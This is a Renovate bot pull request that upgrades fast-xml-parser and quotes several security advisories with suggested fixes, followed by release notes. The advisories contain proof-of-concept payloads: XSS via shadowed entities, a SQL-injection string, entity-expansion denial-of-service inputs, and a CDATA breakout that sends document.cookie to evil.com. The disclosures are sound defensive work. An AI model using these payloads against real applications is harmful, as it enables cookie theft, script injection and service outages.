Skip to content

chore(deps): update dependency fast-xml-parser to v5 [security]#286

Open
renovate[bot] wants to merge 1 commit intothe-onefrom
renovate/npm-fast-xml-parser-vulnerability
Open

chore(deps): update dependency fast-xml-parser to v5 [security]#286
renovate[bot] wants to merge 1 commit intothe-onefrom
renovate/npm-fast-xml-parser-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Feb 2, 2026
edited
Loading

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
fast-xml-parser ^4.4.0^5.0.0 age adoption passing confidence

fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

CVE-2026-25896 / GHSA-m7jm-9gc2-mpf2

More information

Details

Entity encoding bypass via regex injection in DOCTYPE entity names
Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in <. Since DOCTYPE entities are replaced before built-in entities, this shadows < entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot
Shadowing all 5 built-in entities
Entity name Regex created Shadows
l. /&l.;/g &lt;
g. /&g.;/g &gt;
am. /&am.;/g &amp;
quo. /&quo.;/g &quot;
apo. /&apo.;/g &apos;
PoC
const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'
Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected
Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";
Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)

CVE-2026-26278 / GHSA-jmr7-xgp7-cmfj

More information

Details

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC
const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely
Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid using DOCTYPE parsing by processEntities: false option.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

fast-xml-parser has stack overflow in XMLBuilder with preserveOrder

CVE-2026-27942 / GHSA-fj3w-jwp8-x2g3

More information

Details

Impact

Application crashes with stack overflow when user use XML builder with prserveOrder:true for following or similar input

[{
    'foo': [
        { 'bar': [{ '@&#8203;_V': 'baz' }] }
    ]
}]

Cause: arrToStr was not validating if the input is an array or a string and treating all non-array values as text content.
What kind of vulnerability is it? Who is impacted?

Patches

Yes in 5.3.8

Workarounds

Use XML builder with preserveOrder:false or check the input data before passing to builder.

References

Are there any links users can visit to find out more?

Severity

  • CVSS Score: 2.7 / 10 (Low)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)

CVE-2026-33036 / GHSA-8gc5-j5rx-235r

More information

Details

Summary

The fix for CVE-2026-26278 added entity expansion limits (maxTotalExpansions, maxExpandedLength, maxEntityCount, maxEntitySize) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. Numeric character references (&#NNN; and &#xHH;) and standard XML entities (&lt;, &gt;, etc.) are processed through a separate code path that does NOT enforce any expansion limits.

An attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.

Affected Versions

fast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)

Root Cause

In src/xmlparser/OrderedObjParser.js, the replaceEntitiesValue() function has two separate entity replacement loops:

  1. Lines 638-670: DOCTYPE entities — expansion counting with entityExpansionCount and currentExpandedLength tracking. This was the CVE-2026-26278 fix.
  2. Lines 674-677: lastEntities loop — replaces standard entities including num_dec (/&#([0-9]{1,7});/g) and num_hex (/&#x([0-9a-fA-F]{1,6});/g). This loop has NO expansion counting at all.

The numeric entity regex replacements at lines 97-98 are part of lastEntities and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.

Proof of Concept
const { XMLParser } = require('fast-xml-parser');

// Even with strict explicit limits, numeric entities bypass them
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxTotalExpansions: 10,
    maxExpandedLength: 100,
    maxEntityCount: 1,
    maxEntitySize: 10
  }
});

// 100K numeric entity references — should be blocked by maxTotalExpansions=10
const xml = `<root>${'&#&#8203;65;'.repeat(100000)}</root>`;
const result = parser.parse(xml);

// Output: 500,000 chars — bypasses maxExpandedLength=100 completely
console.log('Output length:', result.root.length);  // 500000
console.log('Expected max:', 100);  // limit was 100

Results:

  • 100K &#&#8203;65; references → 500,000 char output (5x default maxExpandedLength of 100,000)
  • 1M references → 5,000,000 char output, ~147MB memory consumed
  • Even with maxTotalExpansions=10 and maxExpandedLength=100, 10K references produce 50,000 chars
  • Hex entities (&#x41;) exhibit the same bypass
Impact

Denial of Service — An attacker who can provide XML input to applications using fast-xml-parser can cause:

  • Excessive memory allocation (147MB+ for 1M entity references)
  • CPU consumption during regex replacement
  • Potential process crash via OOM

This is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.

Suggested Fix

Apply the same entityExpansionCount and currentExpandedLength tracking to the lastEntities loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.

Workaround

Set htmlEntities:false

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Entity Expansion Limits Bypassed When Set to Zero Due to JavaScript Falsy Evaluation in fast-xml-parser

CVE-2026-33349 / GHSA-jp2q-39xq-3w4g

More information

Details

Summary

The DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service.

Details

The OptionsBuilder.js correctly preserves a user-supplied value of 0 using nullish coalescing (??):

// src/xmlparser/OptionsBuilder.js:111
maxEntityCount: value.maxEntityCount ?? 100,
// src/xmlparser/OptionsBuilder.js:107
maxEntitySize: value.maxEntitySize ?? 10000,

However, DocTypeReader.js uses truthy evaluation to check these limits. Because 0 is falsy in JavaScript, the entire guard expression short-circuits to false, and the limit is never enforced:

// src/xmlparser/DocTypeReader.js:30-32
if (this.options.enabled !== false &&
    this.options.maxEntityCount &&          // ← 0 is falsy, skips check
    entityCount >= this.options.maxEntityCount) {
    throw new Error(`Entity count ...`);
}
// src/xmlparser/DocTypeReader.js:128-130
if (this.options.enabled !== false &&
    this.options.maxEntitySize &&            // ← 0 is falsy, skips check
    entityValue.length > this.options.maxEntitySize) {
    throw new Error(`Entity "${entityName}" size ...`);
}

The execution flow is:

  1. Developer configures processEntities: { maxEntityCount: 0, maxEntitySize: 0 } intending to block all entity definitions.
  2. OptionsBuilder.normalizeProcessEntities preserves the 0 values via ?? (correct behavior).
  3. Attacker supplies XML with a DOCTYPE containing many large entities.
  4. DocTypeReader.readDocType evaluates this.options.maxEntityCount && ... — since 0 is falsy, the entire condition is false.
  5. DocTypeReader.readEntityExp evaluates this.options.maxEntitySize && ... — same result.
  6. All entity count and size limits are bypassed; entities are parsed without restriction.
PoC
const { XMLParser } = require("fast-xml-parser");

// Developer intends: "no entities allowed at all"
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxEntityCount: 0,    // should mean "zero entities allowed"
    maxEntitySize: 0       // should mean "zero-length entities only"
  }
});

// Generate XML with many large entities
let entities = "";
for (let i = 0; i < 1000; i++) {
  entities += `<!ENTITY e${i} "${"A".repeat(100000)}">`;
}

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  ${entities}
]>
<foo>&e0;</foo>`;

// This should throw "Entity count exceeds maximum" but does not
try {
  const result = parser.parse(xml);
  console.log("VULNERABLE: parsed without error, entities bypassed limits");
} catch (e) {
  console.log("SAFE:", e.message);
}

// Control test: setting maxEntityCount to 1 correctly blocks
const safeParser = new XMLParser({
  processEntities: {
    enabled: true,
    maxEntityCount: 1,
    maxEntitySize: 100
  }
});

try {
  safeParser.parse(xml);
  console.log("ERROR: should have thrown");
} catch (e) {
  console.log("CONTROL:", e.message);  // "Entity count (2) exceeds maximum allowed (1)"
}

Expected output:

VULNERABLE: parsed without error, entities bypassed limits
CONTROL: Entity count (2) exceeds maximum allowed (1)
Impact
  • Denial of Service: An attacker supplying crafted XML with thousands of large entity definitions can exhaust server memory in applications where the developer configured maxEntityCount: 0 or maxEntitySize: 0, intending to prohibit entities entirely.
  • Security control bypass: Developers who explicitly set restrictive limits to 0 receive no protection — the opposite of their intent. This creates a false sense of security.
  • Scope: Only applications that explicitly set these limits to 0 are affected. The default configuration (maxEntityCount: 100, maxEntitySize: 10000) is not vulnerable. The enabled: false option correctly disables entity processing entirely and is not affected.
Recommended Fix

Replace the truthy checks in DocTypeReader.js with explicit type checks that correctly treat 0 as a valid numeric limit:

// src/xmlparser/DocTypeReader.js:30-32 — replace:
if (this.options.enabled !== false &&
    this.options.maxEntityCount &&
    entityCount >= this.options.maxEntityCount) {

// with:
if (this.options.enabled !== false &&
    typeof this.options.maxEntityCount === 'number' &&
    entityCount >= this.options.maxEntityCount) {
// src/xmlparser/DocTypeReader.js:128-130 — replace:
if (this.options.enabled !== false &&
    this.options.maxEntitySize &&
    entityValue.length > this.options.maxEntitySize) {

// with:
if (this.options.enabled !== false &&
    typeof this.options.maxEntitySize === 'number' &&
    entityValue.length > this.options.maxEntitySize) {
Workaround

If you don't want to processed the entities, keep the processEntities flag to false instead of setting any limit to 0.

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters

CVE-2026-41650 / GHSA-gh4j-gqv2-49f6

More information

Details

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters
Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept
Test 1: Comment Injection (XSS in SVG/HTML context)
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>
Test 2: CDATA Injection (RSS feed)
const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>
Test 3: SOAP Message Injection
const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true
Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

  1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
  2. SOAP injection: Modify SOAP message structure by injecting XML elements
  3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
  4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#&#8203;45;&#&#8203;45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

Severity

  • CVSS Score: 6.1 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

Compare Source

v5.6.0

Compare Source

v5.5.12

Compare Source

v5.5.11

Compare Source

v5.5.10: performance improvment, increase entity expansion default limit

Compare Source

  • increase default entity explansion limit as many projects demand for that
maxEntitySize: 10000,
maxExpansionDepth: 10000,
maxTotalExpansions: Infinity,
maxExpandedLength: 100000,
maxEntityCount: 1000,
  • performance improvement
    • reduce calls to toString
    • early return when entities are not present
    • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

v5.5.9: fix typins and matcher instance in callbacks

Compare Source

combine typings file to avoid configuration changes
pass readonly instance of matcher to the call backs to avoid accidental push/pop call

v5.5.8

Compare Source

v5.5.7

Compare Source

v5.5.6: fix entity expansion and incorrect replacement and performance

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.5...v5.5.6

v5.5.5

Compare Source

v5.5.4

Compare Source

v5.5.3

Compare Source

v5.5.2

Compare Source

v5.5.1: integrate path-expression-matcher

Compare Source

  • support path-expression-matcher
  • fix: stopNode should not be parsed
  • performance improvement for stopNode checking

v5.5.0

Compare Source

v5.4.2

Compare Source

v5.4.1

Compare Source

v5.4.0: Separate Builder

Compare Source

XML Builder was the part of fast-xml-parser for years. But considering that any bug in builder may false-alarm the users who are only using parser and vice-versa, we have decided to split it into a separate package.

Migration

To migrate to fast-xml-builder;

From

import { XMLBuilder } from "fast-xml-parser";

To

import  XMLBuilder  from "fast-xml-builder";

XMLBuilder will be removed from current package in any next major version of this library. So better to migrate.

v5.3.9: support strictReservedNames

Compare Source

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.9...v5.3.9

v5.3.8: handle non-array input for XML builder && support maxNestedTags

Compare Source

v5.3.7: CJS typing fix

Compare Source

What's Changed

New Contributors

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.6...v5.3.7

v5.3.6: Entity security and performance

Compare Source

  • Improve security and performance of entity processing
    • new options maxEntitySize, maxExpansionDepth, maxTotalExpansions, maxExpandedLength, allowedTags,tagFilter
    • fast return when no edtity is present
    • improvement replacement logic to reduce number of calls

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.3.5...v5.3.6

v5.3.5

Compare Source

v5.3.4: fix: handle HTML numeric and hex entities when out of range

Compare Source

v5.3.3: bug fix and performance improvements

Compare Source

  • fix #​775: transformTagName with allowBooleanAttributes adds an unnecessary attribute
  • Performance improvement for stopNodes (By Maciek Lamberski)

v5.3.2

Compare Source

v5.3.1

Compare Source

v5.3.0

Compare Source

v5.2.5

Compare Source

v5.2.4

Compare Source

v5.2.3

Compare Source

v5.2.2: upgrade to ESM module and fixing value parsing issues

Compare Source

  • Support ESM modules
  • fix value parsing issues
  • a feature to access tag location is added (metadata)
  • fix to read DOCTYPE correctly

Full Changelog: https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md

v5.2.1

Compare Source

v5.2.0

Compare Source

v5.1.0

Compare Source

  • feat: declare package as side-effect free (#​738) (By Thomas Bouffard)
  • fix cjs build mode
  • fix builder return type to string

5.0.9 / 2025-03-14

  • fix: support numeric entities with values over 0xFFFF (#​726) (By Marc Durdin)
  • fix: update strnum to fix parsing 0 if skiplike option is used

5.0.8 / 2025-02-27

  • fix parsing 0 if skiplike option is used.
    • updating strnum dependency

5.0.7 / 2025-02-25

5.0.6 / 2025-02-20

5.0.5 / 2025-02-20

  • fix parsing of string starting with 'e' or 'E' by updating strnum

5.0.4 / 2025-02-20

  • fix CLI to support all the versions of node js when displaying library version.
  • fix CJS import in v5
    • by fixing webpack config

5.0.3 / 2025-02-20

  • Using strnum ESM module
    • new fixes in strum may break your experience

5.0.2 / 2025-02-20

  • fix: include CommonJS resources in the npm package #​714 (By Thomas Bouffard)
  • fix: move babel deps to dev deps

5.0.1 / 2025-02-19

  • fix syntax error for CLI command

5.0.0 / 2025-02-19

  • ESM support
    • no change in the functionality, syntax, APIs, options, or documentation.

4.5.2 / 2025-02-18

  • Fix null CDATA to comply with undefined behavior (#​701) (By Matthieu BOHEAS)
  • Fix(performance): Update check for leaf node in saveTextToParentTag function in OrderedObjParser.js (#​707) (By ...)
  • Fix: emit full JSON string from CLI when no output filename specified (#​710) (By Matt Benson)

4.5.1 / 2024-12-15

  • Fix empty tag key name for v5 (#​697). no impact on v4
  • Fixes entity parsing when used in strict mode (#​699)

4.5.0 / 2024-09-03

  • feat #​666: ignoreAttributes support function, and array of string or regex (By ArtemM)

4.4.1 / 2024-07-28

4.4.0 / 2024-05-18

  • fix #​654: parse attribute list correctly for self closing stop node.
  • fix: validator bug when closing tag is not opened. (#​647) (By Ryosuke Fukatani)
  • fix #​581: typings; return type of tagValueProcessor & attributeValueProcessor (#​582) (By monholm)

4.3.6 / 2024-03-16

4.3.5 / 2024-02-24

  • code for v5 is added for experimental use

4.3.4 / 2024-01-10

4.3.3 / 2024-01-10

  • Remove unnecessary regex

4.3.2 / 2023-10-02

4.3.1 / 2023-09-24

  • revert back "Fix typings for builder and parser to make return type generic" to avoid failure of existing projects. Need to decide a common approach.

4.3.0 / 2023-09-20

4.2.7 / 2023-07-30

  • Fix: builder should set text node correctly when only textnode is present (#​589) (By qianqing)
  • Fix: Fix for null and undefined attributes when building xml (#​585) (#​598). A null or undefined value should be ignored. (By Eugenio Ceschia)

4.2.6 / 2023-07-17

4.2.5 / 2023-06-22

  • change code implementation

4.2.4 / 2023-06-06

  • fix security bug

4.2.3 / 2023-06-05

  • fix security bug

4.2.2 / 2023-04-18

  • fix #​562: fix unpaired tag when it comes in last of a nested tag. Also throw error when unpaired tag is used as closing tag

4.2.1 / 2023-04-18

  • fix: jpath after unpaired tags

4.2.0 / 2023-04-09

  • support updateTag parser property

4.1.4 / 2023-04-08

  • update typings to let user create XMLBuilder instance without options (#​556) (By Patrick)
  • fix: IsArray option isn't parsing tags with 0 as value correctly #​490 (#​557) (By Aleksandr Murashkin)
  • feature: support oneListGroup to group repeated children tags udder single group

4.1.3 / 2023-02-26

  • fix #​546: Support complex entity value

4.1.2 / 2023-02-12

  • Security Fix

4.1.1 / 2023-02-03

  • Fix #​540: ignoreAttributes breaks unpairedTags
  • Refactor XML builder code

4.1.0 / 2023-02-02

  • Fix '<' or '>' in DTD comment throwing an error. (#​533) (By Adam Baker)
  • Set "eNotation" to 'true' as default

4.0.15 / 2023-01-25

  • make "eNotation" optional

4.0.14 / 2023-01-22

  • fixed: add missed typing "eNotation" to parse values

4.0.13 / 2023-01-07

4.0.12 / 2022-11-19

  • fix typescript

4.0.11 / 2022-10-05

  • fix #​501: parse for entities only once

4.0.10 / 2022-09-14

4.0.9 / 2022-07-10

  • fix #​470: stop-tag can have self-closing tag with same name
  • fix #​472: stopNode can have any special tag inside
  • Allow !ATTLIST and !NOTATION with DOCTYPE
  • Add transformTagName option to transform tag names when parsing (#​469) (By Erik Rothoff Andersson)

4.0.8 / 2022-05-28

4.0.7 / 2022-03-18

  • support CDATA even if tag order is not preserved
  • support Comments even if tag order is not preserved
  • fix #​446: XMLbuilder should not indent XML declaration

4.0.6 / 2022-03-08

  • fix: call tagValueProcessor only once for array items
  • fix: missing changed for #​437

4.0.5 / 2022-03-06

  • fix #​437: call tagValueProcessor from XML builder

4.0.4 / 2022-03-03

  • fix #​435: should skip unpaired and self-closing nodes when set as stopnodes

4.0.3 / 2022-02-15

4.0.2 / 2022-02-04

  • builder supports suppressUnpairedNode
  • parser supports ignoreDeclaration and ignorePiTags
  • fix: when comment is parsed as text value if given as <!--> ... #​423
  • builder supports decoding &

4.0.1 / 2022-01-08

  • fix builder for pi tag
  • fix: support suppressBooleanAttrs by builder

4.0.0 / 2022-01-06

  • Generating different combined, parser only, builder only, validator only browser bundles
  • Keeping cjs modules as they can be imported in cjs and esm modules both. Otherwise refer esm branch.

4.0.0-beta.8 / 2021-12-13

  • call tagValueProcessor for stop nodes

4.0.0-beta.7 / 2021-12-09

  • fix Validator bug when an attribute has no value but '=' only
  • XML Builder should suppress unpaired tags by default.
  • documents update for missing features
  • refactoring to use Object.assign
  • refactoring to remove repeated code

4.0.0-beta.6 / 2021-12-05

  • Support PI Tags processing
  • Support suppressBooleanAttributes by XML Builder for attributes with value true.

4.0.0-beta.5 / 2021-12-04

  • fix: when a tag with name "attributes"

4.0.0-beta.4 / 2021-12-02

  • Support HTML document parsing
  • skip stop nodes parsing when building the XML from JS object
  • Support external entites without DOCTYPE
  • update dev dependency: strnum v1.0.5 to fix long number issue

4.0.0-beta.3 / 2021-11-30

  • support global stopNodes expression like "*.stop"
  • support self-closing and paired unpaired tags
  • fix: CDATA should not be parsed.
  • Fix typings for XMLBuilder (#​396)(By Anders Emil Salvesen)
  • supports XML entities, HTML entities, DOCTYPE entities

⚠️ 4.0.0-beta.2 / 2021-11-19

  • rename attrMap to attibutes in parser output when preserveOrder:true
  • supports unpairedTags

⚠️ 4.0.0-beta.1 / 2021-11-18

  • Parser returns an array now
    • to make the structure common
    • and to return root level detail
  • renamed cdataTagName to cdataPropName
  • Added commentPropName
  • fix typings

⚠️ 4.0.0-beta.0 / 2021-11-16

  • Name change of many configuration properties.
    • attrNodeName to attributesGroupName
    • attrValueProcessor to attributeValueProcessor
    • parseNodeValue to parseTagValue
    • ignoreNameSpace to removeNSPrefix
    • numParseOptions to numberParseOptions
    • spelling correction for suppressEmptyNode
  • Name change of cli and browser bundle to fxparser
  • isArray option is added to parse a tag into array
  • preserveOrder option is added to render XML in such a way that the result js Object maintains the order of properties same as in XML.
  • Processing behaviour of tagValueProcessor and attributeValueProcessor are changes with extra input parameters
  • j2xparser is renamed to XMLBuilder.
  • You need to build XML parser instance for given options first before parsing XML.
  • fix #​327, #​336: throw error when extra text after XML content
  • fix #​330: attribute value can have '\n',
  • fix #​350: attrbiutes can be separated by '\n' from tagname

3.21.1 / 2021-10-31

  • Correctly format JSON elements with a text prop but no attribute props ( By haddadnj )

3.21.0 / 2021-10-25

  • feat: added option rootNodeName to set tag name for array input when converting js object to XML.
  • feat: added option alwaysCreateTextNode to force text node creation (by: @​massimo-ua)
  • ⚠️ feat: Better error location for unclosed tags. (by @​Gei0r)
    • Some error messages would be changed when validating XML. Eg
      • { InvalidXml: "Invalid '[ \"rootNode\"]' found." }{InvalidTag: "Unclosed tag 'rootNode'."}
      • { InvalidTag: "Closing tag 'rootNode' is expected inplace of 'rootnode'." }{ InvalidTag: "Expected closing tag 'rootNode' (opened in line 1) instead of closing tag 'rootnode'."}
  • ⚠️ feat: Column in error response when validating XML
{
  "code": "InvalidAttr",
  "msg":  "Attribute 'abc' is repeated.",
  "line": 1,
  "col": 22
}

3.20.1 / 2021-09-25

  • update strnum package

3.20.0 / 2021-09-10

  • Use strnum npm package to parse string to number
    • breaking change: long number will be parsed to scientific notation.

3.19.0 / 2021-03-14

  • License changed to MIT o

Note

PR body was truncated to here.

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai Bot commented Feb 2, 2026

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

  • 🔍 Trigger a full review

Comment @coderabbitai help to get the list of available commands and usage tips.

@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Feb 11, 2026
@renovate renovate Bot closed this Feb 11, 2026
@renovate renovate Bot deleted the renovate/npm-fast-xml-parser-vulnerability branch February 11, 2026 22:02
